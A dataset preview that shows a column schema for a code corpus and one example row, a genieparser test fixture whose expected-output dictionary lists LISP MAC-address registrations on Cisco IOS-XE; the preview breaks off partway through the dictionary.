Column schema:

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
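Each `qsc_*` signal appears twice, once as a raw value and once with a `_quality_signal` suffix, alongside per-repository star/issue/fork metadata and the raw file `content`. As a minimal sketch for inspecting these columns, assuming the rows are available locally as a Parquet shard (the filename below is hypothetical):

```python
import pandas as pd

# Hypothetical local shard of the dataset; the real path and filename will differ.
df = pd.read_parquet("code_python_shard-00000.parquet")

# Confirm the column names and dtypes listed in the schema table above.
print(df.dtypes)

# Look at a few metadata and quality-signal columns side by side.
cols = [
    "max_stars_repo_name",
    "size",
    "avg_line_length",
    "qsc_code_frac_chars_dupe_10grams_quality_signal",
]
print(df[cols].head())
```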
Example row (metadata fields):

| field | value |
|---|---|
| hexsha | 07b9d6df6ad2a7711b6cad8c7fbdef205bdec2f7 |
| size | 817,959 |
| ext | py |
| lang | Python |
| max_stars_repo_path | src/genie/libs/parser/iosxe/tests/ShowLispInstanceIdEthernetServer/cli/equal/golden_output_3_expected.py |
| max_stars_repo_name | balmasea/genieparser |
| max_stars_repo_head_hexsha | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 |
| max_stars_repo_licenses | ["Apache-2.0"] |
| max_stars_count | 204 |
| max_stars_repo_stars_event_min_datetime | 2018-06-27T00:55:27.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-03-06T21:12:18.000Z |
| max_issues_repo_path | src/genie/libs/parser/iosxe/tests/ShowLispInstanceIdEthernetServer/cli/equal/golden_output_3_expected.py |
| max_issues_repo_name | balmasea/genieparser |
| max_issues_repo_head_hexsha | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 |
| max_issues_repo_licenses | ["Apache-2.0"] |
| max_issues_count | 468 |
| max_issues_repo_issues_event_min_datetime | 2018-06-19T00:33:18.000Z |
| max_issues_repo_issues_event_max_datetime | 2022-03-31T23:23:35.000Z |
| max_forks_repo_path | src/genie/libs/parser/iosxe/tests/ShowLispInstanceIdEthernetServer/cli/equal/golden_output_3_expected.py |
| max_forks_repo_name | balmasea/genieparser |
| max_forks_repo_head_hexsha | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 |
| max_forks_repo_licenses | ["Apache-2.0"] |
| max_forks_count | 309 |
| max_forks_repo_forks_event_min_datetime | 2019-01-16T20:21:07.000Z |
| max_forks_repo_forks_event_max_datetime | 2022-03-30T12:56:41.000Z |

The `content` field of this row holds the Python source of `golden_output_3_expected.py`, an expected-output module for the genieparser `ShowLispInstanceIdEthernetServer` parser test; it is reproduced below.
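The module consists of a single top-level assignment, so the `expected_output` dictionary it defines can be recovered by executing the source in an isolated namespace. A rough sketch, assuming a local copy of the file (the path below is hypothetical):

```python
from pathlib import Path

# Hypothetical local copy of golden_output_3_expected.py (see max_stars_repo_path above).
src_path = Path("golden_output_3_expected.py")

# The file is a single `expected_output = {...}` assignment, so executing it
# in an empty namespace is enough to materialize the dictionary.
namespace: dict = {}
exec(compile(src_path.read_text(), str(src_path), "exec"), namespace)
expected_output = namespace["expected_output"]

# For example, count the EIDs registered under instance-id 8188.
site_uci = expected_output["instance_id"][8188]["site_name"]["site_uci"]
print(f"{len(site_uci)} EID entries under instance-id 8188")
```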
expected_output = {
"instance_id": {
4097: {"lisp": 0},
4099: {"lisp": 0},
4100: {"lisp": 0},
8188: {
"lisp": 0,
"site_name": {
"site_uci": {
"any-mac": {
"last_register": "never",
"up": "no",
"who_last_registered": "--",
"inst_id": 8188,
},
"1416.9dff.e928/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.eae8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.eb28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.ebc8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.1328/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.13e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.16c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.2428/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.10a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.01eb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.1bcb/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.248b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.254b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.264b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.260c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.278b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.d16f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.1074/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.10b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.10d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.54f4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.5616/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6816/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6955/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6ad5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6af5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6a16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6d95/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6ef5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.6ff5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7095/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.70d5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7395/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.73f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7336/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7495/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7416/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7555/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.75f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7695/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.76f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.77b5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7855/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7875/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7895/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.78f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7836/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7955/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7975/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7936/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7a55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7af5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7a36/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7b75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7b95/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7bb5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7bf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7c75/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7cd5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7cf5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7d55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7dd5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.7e55/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.8436/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.8555/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.8636/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"1416.9dff.89f5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.6e29/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8188,
},
"2c57.41ff.96ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.9929/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.9a41/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.9b58/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.9b78/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"2c57.41ff.9b90/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.9ba0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.a6cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.a6d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.a6d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.af5c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.afa0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b1e0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b1e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b119/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.b11d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b121/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b270/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b29c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b2bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b2d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b2d8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b231/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b23d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b245/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.b251/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.b360/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b368/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b37c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b390/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.b39c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b3b4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3c8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b3cc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3d0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b3e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b3e8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b3ec/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b305/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"2c57.41ff.b309/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b31d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8188,
},
"2c57.41ff.b325/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b32d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.11:52315",
"inst_id": 8188,
},
"2c57.41ff.b331/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b335/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b33d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b34d/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8188,
},
"2c57.41ff.b458/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b45c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8188,
},
"2c57.41ff.b468/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8188,
},
"2c57.41ff.b478/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8188,
},
"2c57.41ff.b488/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.16:36870",
"inst_id": 8188,
},
"2c57.41ff.b564/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b568/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8188,
},
"2c57.41ff.b5a4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8188,
},
"2c57.41ff.b5fc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8188,
},
"2c57.41ff.74e3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1a07/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.1cc6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.67c6/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.d7a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4768/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.48e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4808/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4a28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4be7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4b08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4b68/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4c08/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.4f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.50e7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5108/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5268/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5908/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5948/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5aa7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ac7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5ba7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5bc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b28/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.130.4:60995",
"inst_id": 8188,
},
"2c57.41ff.5b48/48": {
"last_register": "2w1d",
